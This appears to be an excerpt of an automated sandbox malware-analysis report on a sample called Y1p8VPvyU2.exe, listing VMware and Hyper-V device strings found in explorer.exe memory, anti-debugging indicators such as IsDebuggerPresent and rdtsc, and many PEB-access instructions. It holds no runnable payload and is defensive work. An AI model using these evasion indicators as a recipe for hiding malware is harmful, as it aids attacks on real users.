          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}al
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sJ
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: cscript.exe, 00000006.00000002.567306194.0000000003670000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ackagesnH
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0G?
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.339354513.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10011C4A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10011C4A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10007C40 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapReAlloc,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100217EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100219FE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021AAF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021AEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021B2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
